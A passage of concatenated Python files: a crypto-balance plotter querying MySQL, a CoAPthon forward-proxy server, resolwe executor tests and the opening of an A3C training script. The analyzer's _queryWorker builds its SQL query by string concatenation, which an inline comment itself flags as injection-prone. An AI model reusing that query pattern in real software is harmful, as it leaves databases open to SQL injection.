    def _queryWorker(self, cryptoName, lowLimDate, upLimDate, data):
        """Thread worker: fetch (time, amount_usd) rows for one crypto.

        Appends one go.Scatter trace to the shared *data* list
        (list.append is atomic in CPython, so no extra locking is needed).
        """
        # NOTE(security): query is built by string concatenation; inputs are
        # internal today, but this is SQL-injection prone if crypto names or
        # dates ever come from an untrusted source.
        query = ('SELECT amount_usd, insertedTime FROM balances WHERE crypto="'
                 + cryptoName + '" AND insertedTime BETWEEN "'
                 + lowLimDate + '" AND "' + upLimDate + '";')
        db = _mysql.connect(host=self.__dbHost, user=self.__dbUser,
                            passwd=self.__dbPass, db=self.__dbName)
        try:
            print("Querying " + cryptoName)
            db.query(query)
            queryResult = db.store_result()
            num_rows = queryResult.num_rows()
            amount = []
            time = []
            for x in range(num_rows):
                fetched = queryResult.fetch_row(how=1)[0]
                print("Worker[" + cryptoName + "]" + str(x) + "/" + str(num_rows - 1))
                time.append(self._parseTimestamp(fetched["insertedTime"].decode('utf-8')))
                amount.append(float(fetched["amount_usd"]))
            data.append(go.Scatter(x=time, y=amount, name=cryptoName))
            db.commit()
        finally:
            # Always release the connection, even if the query fails
            # (previously a failed query leaked the connection).
            db.close()

    def getAmountInRange(self, cryptoNames, lowLimDate, upLimDate):
        """Creates graphs of amount of crypto in fiat over time, saves to plotly account.

        One query thread is spawned per crypto name; the combined figure is
        uploaded to plotly (online mode) or written to a timestamped local
        HTML file (offline mode).

        :param cryptoNames: iterable of crypto identifiers in the DB
        :param lowLimDate: lower bound, ``YYYY-MM-DD H:M[:S]`` string
        :param upLimDate: upper bound, same format
        :return: the plotly plot result (URL/figure online, filename offline)
        """
        data = []
        threads = []
        for cryptoName in cryptoNames:
            t = threading.Thread(target=self._queryWorker,
                                 args=(cryptoName, lowLimDate, upLimDate, data))
            threads.append(t)
            t.start()
        for thread in threads:
            thread.join()
        minTime = self._parseTimestamp(lowLimDate)
        maxTime = self._parseTimestamp(upLimDate)
        print("Threads complete")
        print("Plotting...")
        layout = go.Layout(
            title="Portfolio Balance Over Time",
            xaxis=dict(
                range=[self.__toUnixTime(minTime),
                       self.__toUnixTime(maxTime)],
                title="Time",
                type="date"
            ),
            yaxis=dict(
                title="Balance USD"
            )
        )
        fig = go.Figure(data=data, layout=layout)
        filename = datetime.datetime.now().strftime('%m-%d-%Y_%H-%M')
        if self.isOnline:
            result = py.iplot(fig, filename=filename + "_portfolio_balances")
        else:
            result = plotly.offline.plot(fig, filename=filename + "_portfolio_balances.html")
        return result

    def getTotalFiat(self):
        """Placeholder for the total fiat balance; not implemented yet."""
        pass  # return self.total_in_fiat

    def __init__(self, online=False):
        """Load credentials and configure plotly.

        :param online: if True, plots are uploaded to the configured plotly
            account instead of being saved locally.
        """
        self.__loadFiles()
        self.isOnline = online
        if self.isOnline:
            plotly.tools.set_credentials_file(username=self.__plotlyUsername,
                                              api_key=self.__plotlyKey)
if __name__ == "__main__":
    # Demo run: plot several days of balances for the tracked portfolio.
    c = CryptoAnalyzer()
    cryptos = ['ethereum', 'bitcoin', 'omisego', 'unikoin-gold',
               'basic-attention-token', 'neo', 'xenon', 'viuly']
    # Bounds must be valid MySQL DATETIME literals (HH:MM:SS) because they go
    # straight into the BETWEEN clause; the previous values carried a spurious
    # extra ":00" component ("1:00:00:00") that MySQL cannot parse reliably.
    print(c.getAmountInRange(cryptos, "2017-12-20 01:00:00", "2017-12-25 23:00:00"))
|
coap.py | import logging
import random
import socket
import struct
import threading
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.cachelayer import CacheLayer
from coapthon.layers.forwardLayer import ForwardLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.resourcelayer import ResourceLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.resources.resource import Resource
from coapthon.serializer import Serializer
from coapthon.utils import Tree
__author__ = 'Giacomo Tanganelli'
logger = logging.getLogger(__name__)
class CoAP(object):
    """
    Implementation of the Forward Proxy
    """
    def __init__(self, server_address, multicast=False, starting_mid=None, cache=False, sock=None):
        """
        Initialize the Forward Proxy.
        :param server_address: Server address for incoming connections
        :param multicast: if the ip is a multicast address
        :param starting_mid: used for testing purposes
        :param cache: if a cache must be used
        :param sock: if a socket has been created externally, it can be used directly
        """
        self.stopped = threading.Event()
        self.stopped.clear()
        # Events appended here are signalled in close() so that waiting
        # retransmission threads wake up and exit promptly.
        self.to_be_stopped = []
        # NOTE(review): this rebinds the attribute name `purge` to the Thread
        # object, shadowing the purge() method; the bound method is captured
        # as the thread target before the rebind, so the thread still works,
        # but purge() is no longer callable on the instance afterwards.
        self.purge = threading.Thread(target=self.purge)
        self.purge.start()
        self.cache_enable = cache
        # Protocol layer pipeline: message (dedup/MID), block-wise transfer,
        # observe, optional cache, and the forward layer that proxies requests.
        self._messageLayer = MessageLayer(starting_mid)
        self._blockLayer = BlockLayer()
        self._observeLayer = ObserveLayer()
        if self.cache_enable:
            self._cacheLayer = CacheLayer(defines.FORWARD_PROXY)
        else:
            self._cacheLayer = None
        self._forwardLayer = ForwardLayer(self)
        self.resourceLayer = ResourceLayer(self)
        # Resource directory
        root = Resource('root', self, visible=False, observable=False, allow_children=True)
        root.path = '/'
        self.root = Tree()
        self.root["/"] = root
        self._serializer = None
        self.server_address = server_address
        self.multicast = multicast
        # First addrinfo entry decides IPv4 vs IPv6 socket setup below.
        addrinfo = socket.getaddrinfo(self.server_address[0], None)[0]
        if sock is not None:
            # Use given socket, could be a DTLS socket
            self._socket = sock
        elif self.multicast: # pragma: no cover
            # Create a socket
            # self._socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 255)
            # self._socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_LOOP, 1)
            # Join group
            if addrinfo[0] == socket.AF_INET: # IPv4
                self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
                # Allow multiple copies of this program on one machine
                # (not strictly needed)
                self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                self._socket.bind(('', self.server_address[1]))
                # Join the "All CoAP Nodes" IPv4 multicast group on any interface.
                mreq = struct.pack("4sl", socket.inet_aton(defines.ALL_COAP_NODES), socket.INADDR_ANY)
                self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
            else:
                # Bugfix for Python 3.6 for Windows ... missing IPPROTO_IPV6 constant
                if not hasattr(socket, 'IPPROTO_IPV6'):
                    socket.IPPROTO_IPV6 = 41
                self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
                # Allow multiple copies of this program on one machine
                # (not strictly needed)
                self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                self._socket.bind(('', self.server_address[1]))
                # Join the "All CoAP Nodes" IPv6 multicast group (interface 0).
                addrinfo_multicast = socket.getaddrinfo(defines.ALL_COAP_NODES_IPV6, 5683)[0]
                group_bin = socket.inet_pton(socket.AF_INET6, addrinfo_multicast[4][0])
                mreq = group_bin + struct.pack('@I', 0)
                self._socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
        else:
            if addrinfo[0] == socket.AF_INET: # IPv4
                self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            else:
                self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
                self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self._socket.bind(self.server_address)
    def purge(self):
        """
        Clean old transactions
        """
        # Runs on a dedicated thread; wakes every EXCHANGE_LIFETIME seconds
        # (or immediately when the server is stopped) and sweeps expired
        # transactions out of the message layer.
        while not self.stopped.isSet():
            self.stopped.wait(timeout=defines.EXCHANGE_LIFETIME)
            self._messageLayer.purge()
    def listen(self, timeout=10):
        """
        Listen for incoming messages. Timeout is used to check if the server must be switched off.
        :param timeout: Socket Timeout in seconds
        """
        self._socket.settimeout(float(timeout))
        while not self.stopped.isSet():
            try:
                data, client_address = self._socket.recvfrom(4096)
            except socket.timeout:
                # Periodic wake-up so the stop flag is re-checked.
                continue
            try:
                # Start a new thread not to block other requests
                args = ((data, client_address), )
                t = threading.Thread(target=self.receive_datagram, args=args)
                t.daemon = True
                t.start()
            except RuntimeError:
                logging.exception("Exception with Executor")
        logging.debug("closing socket")
        self._socket.close()
    def close(self):
        """
        Stop the server.
        """
        logger.info("Stop server")
        self.stopped.set()
        # Wake every waiting retransmission thread so it can terminate.
        for event in self.to_be_stopped:
            event.set()
        # self._socket.close()
    def receive_datagram(self, args):
        """
        Handle messages coming from the udp socket.
        :param args: (data, client_address)
        """
        data, client_address = args
        logging.debug("receiving datagram")
        try:
            host, port = client_address
        except ValueError:
            # IPv6 addresses come as a 4-tuple (host, port, flowinfo, scopeid).
            host, port, tmp1, tmp2 = client_address
        client_address = (host, port)
        serializer = Serializer()
        message = serializer.deserialize(data, client_address)
        if isinstance(message, int):
            # Deserialization failed: the int is the CoAP error code to return.
            logger.error("receive_datagram - BAD REQUEST")
            rst = Message()
            rst.destination = client_address
            rst.type = defines.Types["RST"]
            rst.code = message
            self.send_datagram(rst)
            return
        logger.info("receive_datagram - " + str(message))
        if isinstance(message, Request):
            transaction = self._messageLayer.receive_request(message)
            if transaction.request.duplicated and transaction.completed:
                # Retransmitted request for an already-answered exchange:
                # replay the cached response.
                logger.debug("message duplicated, transaction completed")
                transaction = self._observeLayer.send_response(transaction)
                transaction = self._blockLayer.send_response(transaction)
                transaction = self._messageLayer.send_response(transaction)
                self.send_datagram(transaction.response)
                return
            elif transaction.request.duplicated and not transaction.completed:
                # Duplicate while still processing: just re-acknowledge.
                logger.debug("message duplicated, transaction NOT completed")
                self._send_ack(transaction)
                return
            # Separate-response timer: sends an empty ACK if processing
            # outlasts ACK_TIMEOUT, so the client does not retransmit.
            transaction.separate_timer = self._start_separate_timer(transaction)
            transaction = self._blockLayer.receive_request(transaction)
            if transaction.block_transfer:
                self._stop_separate_timer(transaction.separate_timer)
                transaction = self._messageLayer.send_response(transaction)
                self.send_datagram(transaction.response)
                return
            transaction = self._observeLayer.receive_request(transaction)
            """
            call to the cache layer to check if there's a cached response for the request
            if not, call the forward layer
            """
            if self._cacheLayer is not None:
                transaction = self._cacheLayer.receive_request(transaction)
                if transaction.cacheHit is False:
                    logging.debug(transaction.request)
                    transaction = self._forwardLayer.receive_request(transaction)
                    logging.debug(transaction.response)
                transaction = self._observeLayer.send_response(transaction)
                transaction = self._blockLayer.send_response(transaction)
                transaction = self._cacheLayer.send_response(transaction)
            else:
                transaction = self._forwardLayer.receive_request(transaction)
                transaction = self._observeLayer.send_response(transaction)
                transaction = self._blockLayer.send_response(transaction)
            self._stop_separate_timer(transaction.separate_timer)
            transaction = self._messageLayer.send_response(transaction)
            if transaction.response is not None:
                if transaction.response.type == defines.Types["CON"]:
                    # Confirmable responses need a retransmission task until ACKed.
                    self._start_retransmission(transaction, transaction.response)
                self.send_datagram(transaction.response)
        elif isinstance(message, Message):
            transaction = self._messageLayer.receive_empty(message)
            if transaction is not None:
                transaction = self._blockLayer.receive_empty(message, transaction)
                self._observeLayer.receive_empty(message, transaction)
        else: # is Response
            logger.error("Received response from %s", message.source)
    def send_datagram(self, message):
        """
        Send a message through the udp socket.
        :type message: Message
        :param message: the message to send
        """
        if not self.stopped.isSet():
            host, port = message.destination
            logger.info("send_datagram - " + str(message))
            serializer = Serializer()
            message = serializer.serialize(message)
            self._socket.sendto(message, (host, port))
    def _start_retransmission(self, transaction, message):
        """
        Start the retransmission task.
        :type transaction: Transaction
        :param transaction: the transaction that owns the message that needs retransmission
        :type message: Message
        :param message: the message that needs the retransmission task
        """
        with transaction:
            if message.type == defines.Types['CON']:
                # Initial timeout randomized in [ACK_TIMEOUT, ACK_TIMEOUT * ACK_RANDOM_FACTOR].
                future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
                transaction.retransmit_thread = threading.Thread(target=self._retransmit,
                                                                 args=(transaction, message, future_time, 0))
                transaction.retransmit_stop = threading.Event()
                self.to_be_stopped.append(transaction.retransmit_stop)
                transaction.retransmit_thread.start()
    def _retransmit(self, transaction, message, future_time, retransmit_count):
        """
        Thread function to retransmit the message in the future
        :param transaction: the transaction that owns the message that needs retransmission
        :param message: the message that needs the retransmission task
        :param future_time: the amount of time to wait before a new attempt
        :param retransmit_count: the number of retransmissions
        """
        with transaction:
            # Exponential backoff: the wait doubles after each attempt, up to
            # MAX_RETRANSMIT tries, unless the message gets ACKed/rejected or
            # the server shuts down.
            while retransmit_count < defines.MAX_RETRANSMIT and (not message.acknowledged and not message.rejected) \
                    and not self.stopped.isSet():
                transaction.retransmit_stop.wait(timeout=future_time)
                if not message.acknowledged and not message.rejected and not self.stopped.isSet():
                    retransmit_count += 1
                    future_time *= 2
                    self.send_datagram(message)
            if message.acknowledged or message.rejected:
                message.timeouted = False
            else:
                logger.warning("Give up on message {message}".format(message=message.line_print))
                message.timeouted = True
                if message.observe is not None:
                    # A dead observer is removed so we stop notifying it.
                    self._observeLayer.remove_subscriber(message)
            try:
                self.to_be_stopped.remove(transaction.retransmit_stop)
            except ValueError:
                pass
            transaction.retransmit_stop = None
            transaction.retransmit_thread = None
    def _start_separate_timer(self, transaction):
        """
        Start a thread to handle separate mode.
        :type transaction: Transaction
        :param transaction: the transaction that is in processing
        :rtype : the Timer object
        """
        t = threading.Timer(defines.ACK_TIMEOUT, self._send_ack, (transaction,))
        t.start()
        return t
    @staticmethod
    def _stop_separate_timer(timer):
        """
        Stop the separate Thread if an answer has been already provided to the client.
        :param timer: The Timer object
        """
        timer.cancel()
    def _send_ack(self, transaction):
        """
        Sends an ACK message for the request.
        :param transaction: the transaction that owns the request
        """
        ack = Message()
        ack.type = defines.Types['ACK']
        # Only ACK once; the request may already have been acknowledged by a
        # piggybacked response in the meantime.
        if not transaction.request.acknowledged:
            ack = self._messageLayer.send_empty(transaction, transaction.request, ack)
            self.send_datagram(ack)
|
test_executors.py | # pylint: disable=missing-docstring
import os
import subprocess
import threading
import unittest
from contextlib import suppress
from pathlib import Path
from time import sleep
from unittest import mock
from asgiref.sync import async_to_sync
from django.conf import settings
from django.test import override_settings
from guardian.shortcuts import assign_perm
from resolwe.flow.executors.prepare import BaseFlowExecutorPreparer
from resolwe.flow.managers import manager
from resolwe.flow.managers.utils import disable_auto_calls
from resolwe.flow.models import Data, DataDependency, Process, Worker
from resolwe.test import (
ProcessTestCase,
TestCase,
tag_process,
with_docker_executor,
with_null_executor,
)
# Directories with the test process / descriptor schema definitions,
# resolved relative to this test module.
PROCESSES_DIR = os.path.join(os.path.dirname(__file__), "processes")
DESCRIPTORS_DIR = os.path.join(os.path.dirname(__file__), "descriptors")
class GetToolsTestCase(TestCase):
    # Unit tests for BaseFlowExecutorPreparer.get_tools_paths().
    @mock.patch("resolwe.flow.utils.apps")
    @mock.patch("resolwe.flow.utils.os")
    @mock.patch("resolwe.flow.utils.settings")
    def test_get_tools_paths(self, settings_mock, os_mock, apps_mock):
        # Two registered apps; only the second has a tools/ directory
        # (isdir side effects answer [False, True] in app order).
        apps_mock.get_app_configs.return_value = [
            mock.MagicMock(path="/resolwe/test_app1"),
            mock.MagicMock(path="/resolwe/test_app2"),
        ]
        os_mock.path.join = os.path.join
        os_mock.path.isdir.side_effect = [False, True]
        settings_mock.RESOLWE_CUSTOM_TOOLS_PATHS = ["/custom_tools"]
        base_executor = BaseFlowExecutorPreparer()
        tools_list = base_executor.get_tools_paths()
        # Expect the existing app tools dir plus the custom path.
        self.assertEqual(len(tools_list), 2)
        self.assertIn("/resolwe/test_app2/tools", tools_list)
        self.assertIn("/custom_tools", tools_list)
    @mock.patch("resolwe.flow.utils.apps")
    @mock.patch("resolwe.flow.utils.settings")
    def test_not_list(self, settings_mock, apps_mock):
        # A plain string (not a list) for RESOLWE_CUSTOM_TOOLS_PATHS must be
        # rejected with a descriptive KeyError.
        apps_mock.get_app_configs.return_value = []
        settings_mock.RESOLWE_CUSTOM_TOOLS_PATHS = "/custom_tools"
        base_executor = BaseFlowExecutorPreparer()
        with self.assertRaisesRegex(KeyError, "setting must be a list"):
            base_executor.get_tools_paths()
class ManagerRunProcessTest(ProcessTestCase):
    # End-to-end tests that run real processes through the flow manager,
    # using the schemas registered from PROCESSES_DIR / DESCRIPTORS_DIR.
    def setUp(self):
        super().setUp()
        self._register_schemas(
            processes_paths=[PROCESSES_DIR], descriptors_paths=[DESCRIPTORS_DIR]
        )
    @tag_process("test-min")
    def test_minimal_process(self):
        # A minimal process should simply run to completion.
        self.run_process("test-min")
    @tag_process("test-annotate")
    def test_annotate(self):
        # A process that annotates its entity descriptor with a valid value.
        data = self.run_process("test-annotate")
        self.assertIsNotNone(data.entity)
        dsc = data.entity.descriptor
        self.assertIn("general", dsc)
        self.assertIn("species", dsc["general"])
        self.assertEqual(dsc["general"]["species"], "Valid")
    @tag_process("test-annotate-wrong-option")
    def test_annotate_wrong_option(self):
        # Annotation value outside the schema's choices must fail the process.
        data = self.run_process(
            "test-annotate-wrong-option", assert_status=Data.STATUS_ERROR
        )
        self.assertEqual(len(data.process_error), 1)
        self.assertIn("must match one of predefined choices", data.process_error[0])
    @tag_process("test-annotate-wrong-type")
    def test_annotate_wrong_type(self):
        # Annotation value of the wrong type must fail schema validation.
        data = self.run_process(
            "test-annotate-wrong-type", assert_status=Data.STATUS_ERROR
        )
        self.assertEqual(len(data.process_error), 1)
        self.assertIn("not valid under any of the given schemas", data.process_error[0])
    @tag_process("test-annotate-missing-field")
    def test_annotate_missing_field(self):
        # Annotating a field that is not in the descriptor schema must fail.
        data = self.run_process(
            "test-annotate-missing-field", assert_status=Data.STATUS_ERROR
        )
        self.assertEqual(len(data.process_error), 1)
        self.assertIn("definition (invalid) missing in schema", data.process_error[0])
    @tag_process("test-annotate-no-entity")
    def test_annotate_no_entity(self):
        # Annotation without an owning entity must fail with a clear error.
        data = self.run_process(
            "test-annotate-no-entity", assert_status=Data.STATUS_ERROR
        )
        self.assertEqual(len(data.process_error), 1)
        self.assertIn("No entity to annotate", data.process_error[0])
    @tag_process("test-missing-file")
    def test_missing_file(self):
        # Declaring an output file that was never produced must error out.
        self.run_process("test-missing-file", assert_status=Data.STATUS_ERROR)
        data = Data.objects.last()
        self.assertEqual(data.status, Data.STATUS_ERROR)
        self.assertEqual(len(data.process_error), 1)
        self.assertIn(
            "Output 'output' set to a missing file: 'i-dont-exist.zip'.",
            data.process_error[0],
        )
    @tag_process("test-spawn-new")
    def test_spawn(self):
        # A process that spawns a child Data object: the child must inherit
        # tags, expose the exported file, and be linked as a subprocess child.
        self.run_process("test-spawn-new", tags=["test-tag"])
        data = Data.objects.last()
        file_path = data.location.get_path(filename="foo.bar")
        self.assertEqual(data.output["saved_file"]["file"], "foo.bar")
        self.assertTrue(os.path.isfile(file_path))
        self.assertEqual(data.tags, ["test-tag"])
        parent_data = Data.objects.first()
        self.assertEqual(data.parents.count(), 1)
        self.assertEqual(data.parents.first(), parent_data)
        # Check correct dependency type is created.
        self.assertEqual(
            {d.kind for d in data.parents_dependency.all()},
            {DataDependency.KIND_SUBPROCESS},
        )
    @tag_process("test-spawn-missing-file")
    def test_spawn_missing_export(self):
        # Spawning with a missing export file must fail the parent process.
        data = self.run_process(
            "test-spawn-missing-file", assert_status=Data.STATUS_ERROR
        )
        self.assertIn(
            "Error while preparing spawned Data objects", data.process_error[0]
        )
    @tag_process(
        "test-broken",
        "test-broken-invalid-execution-engine",
        "test-broken-invalid-expression-engine",
        "test-broken-data-name",
    )
    def test_broken(self):
        # Various malformed processes must end in STATUS_ERROR; the invalid
        # execution engine process is created ad hoc here.
        Process.objects.create(
            slug="test-broken-invalid-execution-engine",
            name="Test Process",
            contributor=self.contributor,
            type="data:test",
            version=1,
            run={
                "language": "invalid",
            },
        )
        self.run_process("test-broken", assert_status=Data.STATUS_ERROR)
        self.run_process(
            "test-broken-invalid-expression-engine", assert_status=Data.STATUS_ERROR
        )
        self.run_process(
            "test-broken-invalid-execution-engine", assert_status=Data.STATUS_ERROR
        )
        # If evaluation of data_name template fails, the process should not abort as the
        # template may be evaluatable later when the process completes.
        self.run_process("test-broken-data-name")
    @tag_process("test-broken-invalide-storage")
    def test_invalid_storage_file(self):
        # Invalid JSON written to a storage output must fail validation.
        data = self.run_process(
            "test-broken-invalide-storage", assert_status=Data.STATUS_ERROR
        )
        self.assertEqual(data.status, Data.STATUS_ERROR)
        # NOTE(review): stray debug print left in the test; consider removing.
        print("ERROR", data.process_error[0])
        self.assertIn("must be a valid JSON, current: 1a", data.process_error[0])
    @tag_process("test-workflow-1")
    def test_workflow(self):
        # Run a two-step workflow and verify step wiring, outputs, tag
        # propagation, dependency kinds and inherited permissions.
        assign_perm("view_collection", self.contributor, self.collection)
        assign_perm("view_collection", self.group, self.collection)
        workflow_data = self.run_process(
            "test-workflow-1", {"param1": "world"}, tags=["test-tag"]
        )
        workflow_data.refresh_from_db()
        step1_data = Data.objects.get(process__slug="test-example-1")
        step2_data = Data.objects.get(process__slug="test-example-2")
        # Workflow should output indices of all data objects, in order.
        self.assertEqual(workflow_data.output["steps"], [step1_data.pk, step2_data.pk])
        # Steps should execute with the correct variables.
        self.assertEqual(step1_data.input["param1"], "world")
        self.assertEqual(step1_data.input["param2"], True)
        self.assertEqual(step1_data.output["out1"], "hello world")
        self.assertEqual(step1_data.tags, ["test-tag"])
        self.assertEqual(step2_data.input["param1"], step1_data.pk)
        self.assertEqual(step2_data.input["param2"]["a"], step1_data.pk)
        self.assertEqual(step2_data.input["param2"]["b"], "hello")
        self.assertEqual(step2_data.output["out1"], "simon says: hello world")
        self.assertEqual(step2_data.tags, ["test-tag"])
        self.assertEqual(step1_data.parents.count(), 1)
        self.assertEqual(step1_data.parents.first(), workflow_data)
        self.assertEqual(step2_data.parents.count(), 2)
        self.assertCountEqual(step2_data.parents.all(), [workflow_data, step1_data])
        # Check correct dependency type is created.
        self.assertEqual(
            {d.kind for d in step1_data.parents_dependency.all()},
            {DataDependency.KIND_SUBPROCESS},
        )
        self.assertEqual(
            {d.kind for d in step2_data.parents_dependency.all()},
            {DataDependency.KIND_SUBPROCESS, DataDependency.KIND_IO},
        )
        self.assertTrue(self.contributor.has_perm("flow.view_data", step1_data))
        # User inherites permission from group
        self.assertTrue(self.user.has_perm("flow.view_data", step1_data))
    @tag_process("test-workflow-2")
    def test_workflow_entity(self):
        with self.preparation_stage():
            # `self.run_process` adds input data in self.collection
            input_data = self.run_process("test-example-3")
        workflow = self.run_process("test-workflow-2", {"data1": input_data.pk})
        # Check that workflow results are added to the collection.
        self.assertEqual(
            self.collection.data.filter(pk__in=workflow.output["steps"]).count(), 1
        )
        # self.collection now contains workflow and two "normal" data objects
        self.assertEqual(self.collection.data.all().count(), 3)
    @unittest.skipIf(
        os.environ.get("GITHUB_ACTIONS", "") == "true", "Fails on Github Actions"
    )
    @with_docker_executor
    @tag_process("test-docker")
    def test_run_in_docker(self):
        # Smoke-test the Docker executor end-to-end.
        data = self.run_process("test-docker")
        self.assertEqual(data.output["result"], "OK")
    @with_docker_executor
    @disable_auto_calls()
    def test_terminate_worker(self):
        # Start a long-running process on a side thread, wait for its worker
        # to reach PROCESSING, then terminate it and verify a clean shutdown.
        process = Process.objects.get(slug="test-terminate")
        data = Data.objects.create(
            name="Test data",
            contributor=self.contributor,
            process=process,
        )
        def start_processing(data):
            async_to_sync(manager.communicate)(data_id=data.pk, run_sync=True)
        processing_thread = threading.Thread(target=start_processing, args=(data,))
        processing_thread.start()
        # Wait for up to 5s for process to start.
        for _ in range(50):
            sleep(0.1)
            data.refresh_from_db()
            with suppress(Data.worker.RelatedObjectDoesNotExist):
                if data.worker.status == Worker.STATUS_PROCESSING:
                    break
        self.assertEqual(data.worker.status, Worker.STATUS_PROCESSING)
        data.worker.terminate()
        # Give it max 10 seconds to terminate.
        for _ in range(100):
            sleep(0.1)
            data.refresh_from_db()
            if data.worker.status == Worker.STATUS_COMPLETED:
                break
        self.assertEqual(data.worker.status, Worker.STATUS_COMPLETED)
        self.assertEqual(data.status, Data.STATUS_ERROR)
        self.assertEqual(data.process_error[0], "Processing was cancelled.")
        processing_thread.join(timeout=10)
        self.assertFalse(processing_thread.is_alive())
    @with_docker_executor
    @tag_process("test-requirements-docker")
    def test_executor_requirements(self):
        # Process-declared Docker requirements must be honored.
        data = self.run_process("test-requirements-docker")
        self.assertEqual(data.output["result"], "OK")
    @with_docker_executor
    @tag_process("test-docker-uid-gid")
    def test_docker_uid_gid(self):
        # The container must run with the expected uid/gid mapping.
        data = self.run_process("test-docker-uid-gid")
        self.assertEqual(data.output["result"], "OK")
    @unittest.skip("Null executor test currently not working.")
    @with_null_executor
    @tag_process("test-save-number")
    def test_null_executor(self):
        # Null executor accepts the data but never processes it (WAITING).
        data = self.run_process(
            "test-save-number", {"number": 19}, assert_status=Data.STATUS_WAITING
        )
        self.assertEqual(data.input["number"], 19)
        self.assertEqual(data.output, {})
    @unittest.skipIf(
        os.environ.get("GITHUB_ACTIONS", "") == "true", "Fails on Github Actions"
    )
    @with_docker_executor
    @tag_process("test-memory-resource-alloc", "test-memory-resource-noalloc")
    def test_memory_resource(self):
        # This process should be terminated due to too much memory usage.
        self.run_process("test-memory-resource-alloc", assert_status=Data.STATUS_ERROR)
        # This process should run normally (honors the limits).
        self.run_process("test-memory-resource-noalloc")
    @with_docker_executor
    @tag_process("test-cpu-resource-1core", "test-cpu-resource-2core")
    def test_cpu_resource(self):
        # Currently there is no good way to test this reliably, so we just check if the
        # resource limit specification still makes the process run.
        self.run_process("test-cpu-resource-1core")
        self.run_process("test-cpu-resource-2core")
    @unittest.skipIf(
        settings.FLOW_DOCKER_DISABLE_SECCOMP, "Docker seccomp is disabled."
    )
    @with_docker_executor
    @tag_process(
        "test-network-resource-enabled",
        "test-network-resource-disabled",
        "test-network-resource-policy",
    )
    def test_network_resource(self):
        # Network access must only work when the resource allows it.
        self.run_process("test-network-resource-enabled")
        self.run_process(
            "test-network-resource-disabled", assert_status=Data.STATUS_ERROR
        )
        self.run_process(
            "test-network-resource-policy", assert_status=Data.STATUS_ERROR
        )
    @with_docker_executor
    @override_settings(FLOW_PROCESS_RESOURCE_DEFAULTS={"cpu_time_interactive": 1})
    @tag_process(
        "test-scheduling-class-interactive-ok",
        "test-scheduling-class-interactive-fail",
        "test-scheduling-class-batch",
    )
    def test_scheduling_class(self):
        # Interactive processes get a 1s CPU-time cap (see override above);
        # batch processes are unaffected.
        self.run_process("test-scheduling-class-interactive-ok")
        self.run_process(
            "test-scheduling-class-interactive-fail", assert_status=Data.STATUS_ERROR
        )
        self.run_process("test-scheduling-class-batch")
    @with_docker_executor
    @tag_process("test-save-number")
    def test_executor_fs_lock(self):
        # Re-running the executor over an already-completed data location must
        # be a no-op (filesystem lock) and must not purge extra files.
        # First, run the process normaly.
        data = self.run_process("test-save-number", {"number": 42})
        # Make sure that process was successfully ran first time.
        self.assertEqual(data.output["number"], 42)
        data.output = {}
        data.save()
        file = Path(data.location.get_path(filename="temporary_file_do_not_purge.txt"))
        self.assertFalse(file.exists())
        file.touch()
        process = subprocess.run(
            ["python", "-m", "executors", ".docker"],
            cwd=data.get_runtime_path(),
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            timeout=10,
        )
        self.assertEqual(process.returncode, 0)
        data.refresh_from_db()
        self.assertEqual(data.output, {})
        self.assertEqual(data.status, Data.STATUS_DONE)
        self.assertEqual(data.process_error, [])
        # Check that temporary file was not deleted.
        self.assertTrue(file.exists())
|
main.py | from __future__ import print_function
import argparse
import os
import torch
import torch.multiprocessing as mp
import gym
import my_optim
from model import ActorCritic
from test import test
from train import train
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# Command-line interface for the A3C training hyper-parameters.
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument('--lr', type=float, default=0.0001,
                    help='learning rate (default: 0.0001)')
parser.add_argument('--gamma', type=float, default=0.99,
                    help='discount factor for rewards (default: 0.99)')
parser.add_argument('--gae-lambda', type=float, default=1.00,
                    help='lambda parameter for GAE (default: 1.00)')
parser.add_argument('--entropy-coef', type=float, default=0.01,
                    help='entropy term coefficient (default: 0.01)')
parser.add_argument('--value-loss-coef', type=float, default=0.5,
                    help='value loss coefficient (default: 0.5)')
# Help text fixed: it previously said "value loss coefficient" (copy-paste).
parser.add_argument('--max-grad-norm', type=float, default=50,
                    help='maximum gradient norm for clipping (default: 50)')
parser.add_argument('--seed', type=int, default=1,
                    help='random seed (default: 1)')
parser.add_argument('--num-processes', type=int, default=4,
                    help='how many training processes to use (default: 4)')
parser.add_argument('--num-steps', type=int, default=20,
                    help='number of forward steps in A3C (default: 20)')
parser.add_argument('--max-episode-length', type=int, default=1000000,
                    help='maximum length of an episode (default: 1000000)')
parser.add_argument('--env-name', default='PongDeterministic-v4',
                    help='environment to train on (default: PongDeterministic-v4)')
# NOTE(review): without action='store_true' any value given to --no-shared
# (even the string "False") is truthy; kept as-is for CLI compatibility.
parser.add_argument('--no-shared', default=False,
                    help='use an optimizer without shared momentum.')
if __name__ == '__main__':
    # Single OpenMP thread per process and CPU-only: each A3C worker is a
    # separate OS process, so intra-op threading would oversubscribe cores.
    os.environ['OMP_NUM_THREADS'] = '1'
    os.environ['CUDA_VISIBLE_DEVICES'] = ""
    args = parser.parse_args()
    torch.manual_seed(args.seed)
    env = gym.make(args.env_name)
    # The model is placed in shared memory so every worker process updates
